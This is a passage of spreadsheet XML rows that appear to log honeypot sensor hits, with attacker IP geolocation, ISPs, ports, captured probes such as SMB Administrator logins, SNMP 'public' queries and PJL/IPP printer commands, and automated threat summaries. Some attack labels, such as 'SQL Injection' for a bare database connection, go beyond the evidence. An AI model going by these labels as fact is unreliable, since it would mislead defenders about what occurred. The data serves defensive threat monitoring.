    <x v="0"/>
    <d v="2025-04-28T22:10:38"/>
    <d v="2025-03-13T08:34:28"/>
    <d v="2025-04-28T22:10:38"/>
    <n v="72"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21"/>
    <s v="23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="21"/>
    <s v="Piedmont"/>
    <s v="Province of Alessandria"/>
    <s v="Alessandria"/>
    <s v="3183299"/>
    <s v="15100"/>
    <s v="44.9073"/>
    <s v="8.61168"/>
    <s v="3269"/>
    <s v="Telecom Italia S.p.A."/>
    <s v="INTERBUSINESS"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4f08:38ea"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="531"/>
    <x v="531"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T22:08:47"/>
    <d v="2025-04-28T05:39:34"/>
    <d v="2025-04-28T22:08:47"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="business"/>
    <s v="BSNL GSM EastZone"/>
    <s v="2004-09-06"/>
    <s v="BSNL-GSM-EastZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b62:1871"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="532"/>
    <x v="532"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T22:01:22"/>
    <d v="2025-04-28T22:01:22"/>
    <d v="2025-04-28T22:01:22"/>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de:ef15"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No connection attempt made over telnet, or activity was not detected through this service. _x000a_Activity appears to be benign with no notable malicious attempts observed._x000a_Service is inactive for the specified timeframe. &amp;&amp; This log indicates that there was an attempted connection to a telnet service, but no further information is available about the attempt. The lack of activity may suggest a failed or blocked attack. No actual malicious activity occurred."/>
    <s v="Telnet Attack &amp;&amp; Telnet Attack"/>
  </r>
  <r>
    <x v="533"/>
    <x v="533"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T21:29:27"/>
    <d v="2025-03-31T17:46:18"/>
    <d v="2025-04-28T21:29:27"/>
    <n v="66"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H33"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="CO"/>
    <s v="Colombia"/>
    <s v="DC"/>
    <s v="Bogota D.C."/>
    <s v="Bogotá  D.C."/>
    <s v="Bogotá (Suba)"/>
    <s v="3688689"/>
    <s v="111111"/>
    <s v="4.69732"/>
    <s v="-74.0697"/>
    <s v="3816"/>
    <s v="COLOMBIA TELECOMUNICACIONES S.A. ESP"/>
    <s v="Colombia Telecomunicaciones S.a. ESP"/>
    <s v="business"/>
    <s v="Colombia Telecomunicaciones S.a. ESP BIC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (152.200.195.92,39455)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (152.200.195.92,40471)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:98c8:c35c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="An authentication attempt was made using the Administrator account for a Windows service._x000a_This could be an attempted brute-force login or unauthorized access to sensitive areas of the system._x000a_The use of the default administrator account suggests potential malicious activity. &amp;&amp; An attempt was made to authenticate as Administrator using SMB protocol. This could be a reconnaissance or initial phase of an attack trying to gain access to the system. The attacker is likely trying to escalate privileges by assuming a high-level account. &amp;&amp; An incoming connection from an unknown IP address is attempting to access a service. This could be a scanning or probing activity, potentially leading to unauthorized access. It may indicate malicious intent. &amp;&amp; An incoming connection from an unknown IP address is attempting to access SMB service. This could be a potential attempt to exploit vulnerabilities or transfer malware. The source IP may be associated with malicious activity. &amp;&amp; An attempt was made to authenticate as Administrator using SMB protocol likely for unauthorized access or malicious purposes such as spreading malware or executing commands. This could be a precursor to more severe actions like lateral movement or data exfiltration. The use of the Administrator account suggests an effort to escalate privileges or exploit system vulnerabilities. &amp;&amp; The administrator account is attempting to authenticate with SMB service, which may indicate an unauthorized login attempt or brute force attack. _x000a_This could be a malicious actor trying to gain access to the system using a privileged account._x000a_A potential security incident is unfolding as the attacker attempts to leverage administrative credentials."/>
    <s v="Password Crack &amp;&amp; SMB Brute Force &amp;&amp; SMB Brute &amp;&amp; SMB Scanning"/>
  </r>
  <r>
    <x v="534"/>
    <x v="534"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T21:25:14"/>
    <d v="2024-07-25T09:11:34"/>
    <d v="2025-04-28T21:25:14"/>
    <n v="48"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;64704&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="SN"/>
    <s v="South Sulawesi"/>
    <s v="Gowa Regency"/>
    <s v="Sungguminasa"/>
    <s v="1625863"/>
    <s v="92111"/>
    <s v="-5.20591"/>
    <s v="119.452"/>
    <s v="150283"/>
    <s v="Dinas Komunikasi Informatika, Statistik dan Persandian Kabupaten Gowa"/>
    <s v="Dinas Komunikasi Informatika, Statistik dan Persandian Kabupaten Gowa"/>
    <s v="business"/>
    <s v="Dinas Komunikasi Informatika"/>
    <s v="2022-11-28"/>
    <s v="IDNIC-DISKOMINFO-GOWA-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6766:1a05"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="A SQL database is being scanned for vulnerabilities, potentially leading to unauthorized access or exploitation of security weaknesses. _x000a_This activity suggests an attacker may be attempting to gain unauthorized access to sensitive data._x000a_ Malicious scanning of database systems is a common tactic used in cyber attacks."/>
    <s v="SQL Injection"/>
  </r>
  <r>
    <x v="535"/>
    <x v="535"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T21:17:40"/>
    <d v="2025-04-28T21:17:40"/>
    <d v="2025-04-28T21:17:40"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="CG"/>
    <s v="Chhattisgarh"/>
    <s v="Korba"/>
    <s v="Katghora"/>
    <s v="1267517"/>
    <s v="NA"/>
    <s v="22.5025"/>
    <s v="82.5428"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:42e0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Unknown telnet connection attempt was detected, potentially a malicious probe or reconnaissance effort to identify active services._x000a_The nature of this activity is exploratory and may be indicative of a larger attack strategy._x000a_This could be the initial step in a more sinister attack on network assets. &amp;&amp; This log indicates that there was an attempt to connect to the Telnet service but it did not succeed as it returned NA, indicating no activity or no valid connection established. This could be due to a timeout or the connection being rejected possibly maliciously. It might suggest probing for vulnerabilities in the system."/>
    <m/>
  </r>
  <r>
    <x v="536"/>
    <x v="536"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T21:03:16"/>
    <d v="2025-02-18T18:16:11"/>
    <d v="2025-04-28T21:03:16"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_RDP_H2&amp;&amp;SMA-LAB_VNC_HC1"/>
    <s v="3389&amp;&amp;5900&amp;&amp;161&amp;&amp;443&amp;&amp;445&amp;&amp;143&amp;&amp;631"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="108"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="BE"/>
    <s v="Berlin"/>
    <s v="NA"/>
    <s v="Berlin (Bezirk Treptow-Köpenick)"/>
    <s v="2950159"/>
    <s v="12489"/>
    <s v="52.4286"/>
    <s v="13.531600000000001"/>
    <s v="208843"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="business"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="2005-09-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="stshash&amp;&amp;connection&amp;&amp;query"/>
    <s v="{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '194.233.76.135', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SMB:Incoming connection (194.187.176.27,50510)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.115.66:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.115.66:631/ipp|ATTR requested-attributes all'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c2bb:b01b"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="The data suggests a malicious attempt to query printer attributes, possibly for reconnaissance or exploitation of the target system's print services._x000a_This could be an initial scan before more severe attacks._x000a_It may also indicate unauthorized access to sensitive printer settings and configurations. &amp;&amp; This data suggests an unauthorized attempt to retrieve information about a printer on the network, possibly as part of a reconnaissance or exploitation activity. The request is for detailed printer attributes, including location and capabilities. This could be indicative of a probing attack to identify vulnerable printers."/>
    <s v="IP Attack _x000a_ Printer Hack"/>
  </r>
  <r>
    <x v="537"/>
    <x v="537"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T20:41:32"/>
    <d v="2025-04-28T20:41:32"/>
    <d v="2025-04-28T20:41:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Mumbai"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:a004"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="538"/>
    <x v="538"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T20:22:30"/>
    <d v="2025-04-28T20:22:30"/>
    <d v="2025-04-28T20:22:30"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="1136"/>
    <s v="KPN"/>
    <s v="Kpn B.v."/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4dab:e5c4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="539"/>
    <x v="539"/>
    <s v="NA&amp;&amp;76.11.109.208.host.secureserver.net"/>
    <x v="0"/>
    <d v="2025-04-28T20:11:34"/>
    <d v="2023-11-30T03:32:12"/>
    <d v="2025-04-28T20:11:34"/>
    <n v="232"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_MSSQL_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;21548&amp;&amp;64367&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda"/>
    <s v="11749713"/>
    <s v="100-0001"/>
    <s v="35.694"/>
    <s v="139.754"/>
    <s v="26496"/>
    <s v="GoDaddy.com, LLC"/>
    <s v="GoDaddy.com, LLC"/>
    <s v="hosting"/>
    <s v="GoDaddy.com, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d06d:b4c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="540"/>
    <x v="540"/>
    <s v="zl-dala-us-gp1-wk121a.internet-census.org&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-28T20:10:45"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-28T20:10:45"/>
    <n v="290"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_IRC_H17&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_IRC_H8&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_DNS_H37&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_IRC_H10&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_IMAP_H3&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_POSTGRES_H2&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_SIP_H29&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_SIP_H36&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;6667&amp;&amp;6379&amp;&amp;21&amp;&amp;53&amp;&amp;39186&amp;&amp;1521&amp;&amp;161&amp;&amp;NA&amp;&amp;143&amp;&amp;43645&amp;&amp;5900&amp;&amp;389&amp;&amp;9100&amp;&amp;3389&amp;&amp;80&amp;&amp;23&amp;&amp;445&amp;&amp;110&amp;&amp;443&amp;&amp;42739"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="TX"/>
    <s v="Texas"/>
    <s v="Dallas"/>
    <s v="Dallas"/>
    <s v="4684888"/>
    <s v="75270"/>
    <s v="32.7767"/>
    <s v="-96.797"/>
    <s v="21859"/>
    <s v="Zenlayer Inc"/>
    <s v="Zenlayer Inc"/>
    <s v="business"/>
    <s v="ICG 1 ZEN DFW"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA&amp;&amp;command&amp;&amp;login&amp;&amp;query&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'LMOB0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (185.180.141.12,50036)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_IRC:{'command': 'SSH-2.0-GO', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.2.0 1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.1.4.0 1.3.6.1.2.1.1.5.0 1.3.6.1.2.1.1.6.0 1.3.6.1.2.1.1.7.0', 'version': '1'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=185.180.141.12;rport=58762'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (185.180.141.12,60866)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 122.170.7.108:9100_x000d__x000a_User-Agent: Mozilla/5.0 